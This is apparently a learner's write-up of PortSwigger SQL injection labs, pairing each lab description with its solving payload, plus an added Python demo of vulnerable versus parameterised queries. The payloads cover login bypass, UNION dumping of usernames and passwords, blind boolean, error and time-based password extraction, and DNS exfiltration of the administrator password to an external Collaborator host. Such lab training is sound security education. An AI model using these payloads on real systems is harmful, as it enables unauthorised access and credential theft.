SQL INJECTION
Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:
```
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```
To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.
```
'+OR+1=1--
```
Lab: SQL injection vulnerability allowing login bypass
This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.
```
username=administrator'--
```
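The root cause of both labs above is the same: the category value and the username are spliced into the SQL text. As an added example (not code from the writeup or from PortSwigger), the following Python reproduces that defect against an in-memory SQLite database with constructed rows, and shows the parameterised form that neutralises both payloads:

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the lab's database (not real lab rows)
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1), ('Unreleased Gift', 'Gifts', 0),
                                    ('Pen', 'Office', 1);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'admin-pass'), ('wiener', 'peter');
    """)
    return db

def products_vulnerable(db, category):
    # The user-controlled category is spliced into the SQL text, like the lab's
    # query: a quote in the input closes the string literal and '--' comments
    # out "AND released = 1", so unreleased rows are returned.
    sql = ("SELECT name FROM products WHERE category = '" + category +
           "' AND released = 1")
    return [row[0] for row in db.execute(sql)]

def products_safe(db, category):
    # Parameterised query: the value is bound, never parsed as SQL, so the
    # released = 1 restriction cannot be commented out.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in db.execute(sql, (category,))]

def login_vulnerable(db, username, password):
    # Same defect in the login check: "administrator'--" removes the password test.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    # Bound parameters: the quote and comment stay inside the username value.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print(products_vulnerable(db, "' OR 1=1--"))        # unreleased product leaks
    print(products_safe(db, "' OR 1=1--"))              # [] : treated as a literal category
    print(login_vulnerable(db, "administrator'--", "x"))  # 'administrator'
    print(login_safe(db, "administrator'--", "x"))        # None
```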
Lab: SQL injection UNION attack, determining the number of columns returned by the query
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.
Use ORDER BY to find the number of columns, or UNION SELECT with nulls (this lab requires the UNION SELECT form to be marked as solved).
```
filter?category=Corporate+gifts' order by 3--
```
Lab: SQL injection UNION attack, finding a column containing text
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.
The goal is to find which column can hold string data, so that we can extract database contents in the next step. Replace the nulls with a string one column at a time; a column that is not string-typed produces an error. The second column turns out to work.
```
Gifts' union select null,'xWslwe',null --
```
Lab: SQL injection UNION attack, retrieving data from other tables
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called users, with columns called username and password. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
The lab tells us there is a table users with columns username and password, and asks us to obtain the administrator's credentials. As before, use ORDER BY to see how many columns are returned, then test which column can carry strings.
```
Gifts' union select username,password from users--
```
Lab: SQL injection UNION attack, retrieving multiple values in a single column
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called users, with columns called username and password. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Only one column can hold strings, so multiple values can be retrieved in that single column by concatenating them together. The concatenation syntax per database is listed in this table:
https://portswigger.net/web-security/sql-injection/cheat-sheet
| Database | Concatenation |
| ---------- | ---------------------------------------------------------- |
| Oracle | 'foo'||'bar' |
| Microsoft | 'foo'+'bar' |
| PostgreSQL | 'foo'||'bar' |
| MySQL | 'foo' 'bar' [Note the space between the two strings] CONCAT('foo','bar') |
```
Gifts' union select null,username||'~'||password from users--
```
Lab: Blind SQL injection with conditional responses
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a Welcome back message in the page if the query returns any rows. The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user. To solve the lab, log in as the administrator user.
Capture the request in Burp Suite and modify the TrackingId cookie to:
```
TrackingId=qvo4LQBOsQ69LE2x' AND '1'='1
```
Verify that the Welcome back message appears in the response. Now change it to:
```
TrackingId=qvo4LQBOsQ69LE2x' AND '1'='2
```
Verify that the Welcome back message does not appear in the response. This demonstrates how to test a single boolean condition and infer the result.
```
TrackingId=qvo4LQBOsQ69LE2x' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
```
You can also brute-force the password length first.
Lab: Blind SQL injection with conditional errors
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user. To solve the lab, log in as the administrator user.
In this lab the conditional-response technique no longer works: the response is the same whether the condition is true or false, so we try conditional errors instead. The lab hints that the database is Oracle, so we can consult the cheat sheet:
https://portswigger.net/web-security/sql-injection/cheat-sheet
```
BUGV2pWiP6dUlEiv' AND (SELECT CASE WHEN 1=0 THEN to_char(1/0) ELSE 'a' END FROM dual)='a
```
Why use to_char(1/0) here rather than plain 1/0 to trigger the divide-by-zero error? In Oracle, every possible return branch of a CASE expression must have the same data type: the THEN branch must return the same type as the ELSE branch, otherwise Oracle raises a type error before the division by zero is ever evaluated.
Brute-force the length; it is 20.
```
BUGV2pWiP6dUlEiv' AND (SELECT CASE WHEN length(password)=1 THEN to_char(1/0) ELSE 'a' END from users where username='administrator')='a
```
Then set up a Cluster bomb attack in Burp Intruder to brute-force the character at each of the 20 positions.
```
BUGV2pWiP6dUlEiv' AND (SELECT CASE WHEN SUBSTR(password,1,1)='t' THEN to_char(1/0) ELSE 'a' END from users where username='administrator')='a
```
Lab: Visible error-based SQL injection
This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned.
The database contains a different table called users, with columns called username and password. To solve the lab, find a way to leak the password for the administrator user, then log in to their account.
This lab uses error-based injection: adding a single quote makes the application return the error message directly:
```
Unterminated string literal started at position 52 in SQL SELECT * FROM tracking WHERE id = '1WgE3VBZpDwz8Skn''. Expected char
```
Use the fact that CAST of a string to int raises an error. The query length is limited, so use LIMIT 1 and delete the original cookie value before the payload; otherwise the length limit truncates the query.
```
'or CAST((SELECT username from users limit 1) AS int)=1--
```
Lab: Blind SQL injection with time delays
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.
Time-based injection:
```
TrackingId=x'||pg_sleep(10)--
```
|| is the string concatenation operator. Unlike MySQL, PostgreSQL does not accept OR pg_sleep(10), because the types do not match: a boolean cannot be combined with void using OR. If you used an OR expression instead of the concatenation operator:
- Left side: id = 'x' → boolean (TRUE/FALSE)
- Right side: pg_sleep(10) → returns void (no value)
Lab: Blind SQL injection with time delays and information retrieval
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user. To solve the lab, log in as the administrator user.
Building on the previous lab, brute-force the account's password:
```
vSDNFCcNXur0Qevt' || (SELECT CASE WHEN (username='administrator' and length(password)=0) THEN pg_sleep(2) ELSE pg_sleep(0) END from users)--
```
Lab: Blind SQL injection with out-of-band interaction
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.
This time the site executes the SQL asynchronously, so timing differences can no longer be observed; use DNS out-of-band interaction instead.
```
H6B7TghULcLtqs5R' union select EXTRACTVALUE(xmltype('%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fcyej8oek4gwsfbrnhy397kzmmds4gw4l.oastify.com%2F%22%3E%20%25remote%3B%5D%3E')%2C'%2Fl')%20FROM%20dual --
```
Lab: Blind SQL injection with out-of-band data exfiltration
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user. To solve the lab, log in as the administrator user.
Building on the previous lab, exfiltrate the data through the DNS lookup:
```
' union select EXTRACTVALUE(xmltype('%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2F'%7C%7C(SELECT password from users where username='administrator')%7C%7C'.bl0ivn1jrfjr2aem4xq8ujml9cf43wrl.oastify.com%2F%22%3E%20%25remote%3B%5D%3E')%2C'%2Fl')%20FROM%20dual --
```
Lab: SQL injection with filter bypass via XML encoding
This lab contains a SQL injection vulnerability in its stock check feature. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The database contains a users table, which contains the usernames and passwords of registered users. To solve the lab, perform a SQL injection attack to retrieve the admin user’s credentials, then log in to their account.
Hex HTML entity encoding bypasses the WAF's detection. I learned a new extension that is very handy: Hackvertor.
Lab: SQL injection attack, querying the database type and version on Oracle
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
On Oracle, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query a table, you still need to include the FROM keyword followed by a valid table name.
Oracle has a built-in table called dual that you can use for this purpose. For example: UNION SELECT 'abc' FROM dual
```
?category=Pets'union select null,null from dual --
```
Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
This lab's database is MySQL. At first my -- comment had no effect; then I remembered that in MySQL a -- comment must be followed by a space.
```
Accessories' UNION SELECT '1111', NULL --%20
```
Or use #:
```
Accessories' UNION SELECT '1111', NULL %23
Accessories' UNION SELECT @@version, NULL %23
```
Lab: SQL injection attack, listing the database contents on non-Oracle databases
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
```
Pets'union select table_name,'1' from information_schema.tables--
```
Lab: SQL injection attack, listing the database contents on Oracle
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
```
Lifestyle' union select table_name,'a' from all_tables--
```